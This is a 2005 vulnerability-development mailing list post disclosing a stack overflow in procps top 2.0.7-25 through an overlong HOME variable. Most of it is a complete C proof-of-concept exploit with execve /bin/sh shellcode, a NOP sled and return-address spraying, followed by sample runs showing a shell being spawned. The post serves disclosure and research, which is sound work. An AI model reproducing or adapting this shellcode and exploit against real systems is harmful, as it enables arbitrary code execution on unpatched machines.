Vulnerability Development mailing list archives
top (procps-2.0.7-25) vulnerability
From: WINNY THOMAS <winnymthomas () yahoo com>
Date: Fri, 6 May 2005 21:30:19 -0700 (PDT)
While running top on a tool of mine to do a profiling test the top command ran into a segmentation fault. I could find two instance where the command could misbehave 1. if you have junk data inside a file .toprc in your home directory 2. if your environmental variable HOME is set to a string thats greater than 1024. I managed to spawn a shell out of top command by exploiting the second issue. If you compile and run the exploit code which I am including in the mail body you will get a shell. Incase you dont you could pass parameters to the program as follows to adjust the offset. The vulnerability detail is included in the code comment [winnythomas@r8 WinnyThomas]$ ./putshellcode 1001 sh-2.05b$ exit exit [winnythomas@r8 WinnyThomas]$ ./putshellcode 120 Illegal instruction [winnythomas@r8 WinnyThomas]$ ./putshellcode 1010 sh-2.05b$ exit exit in most of the test I did on the vulnerable code I got shell on my system without passing any parameter to the program (that is the hardcoded offset of 1111 in my program worked well on my system) /* * Program: Proof of concept code for top exploit * Author: Winny Thomas, Nevis networks pune * Vulerability: in top.c the function get_options uses strcpy to copy the value of the * environment variable HOME into a static buffer that is allocated on the stack. hence * its possible to apply standard stack smashing attack to overwrite the return address * on the stack and execute a code which is of the attackers choice * NOTE: top is not setuid and hence the exploit wont spawn a root shell. * Tested on Red Hat 8 with procps verion 2.0.7-25. the problem has * been fixed in the latest versions * * This code is for educational purpose only and the * author shall not bear any responsibility for any * damage caused by using this code */ #include <stdio.h> #include <stdlib.h> char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"; char exploit_variable[1200]; long get_esp(void) { __asm__("movl %esp, %eax"); } int main(int argc, char *argv[]) { long stackp, retaddr; char SETENV[1250]; long *ptr; int i, j, offset = 1111; if (argc > 1) offset = atoi(argv[1]); stackp = get_esp(); retaddr = stackp - offset; ptr = exploit_variable; for (i = 0; i < 1200; i += 4) *ptr++ = retaddr; for (i = 0; i < 600; i++) exploit_variable[i] = '\x90'; for (j = 0 ;j < strlen(shellcode); j++, i++) exploit_variable[i] = shellcode[j]; sprintf(SETENV, "HOME="); strcat(SETENV, exploit_variable); putenv(SETENV); execl("/usr/bin/top", "top", (char *)0); } __________________________________ Do you Yahoo!? Make Yahoo! your home page http://www.yahoo.com/r/hs
Current thread:
- top (procps-2.0.7-25) vulnerability WINNY THOMAS (May 09)
- Re: top (procps-2.0.7-25) vulnerability Ayaz Ahmed Khan (May 10)
- Re: top (procps-2.0.7-25) vulnerability KF (lists) (May 10)
- Re: top (procps-2.0.7-25) vulnerability KF (lists) (May 10)
- Re: top (procps-2.0.7-25) vulnerability Ayaz Ahmed Khan (May 10)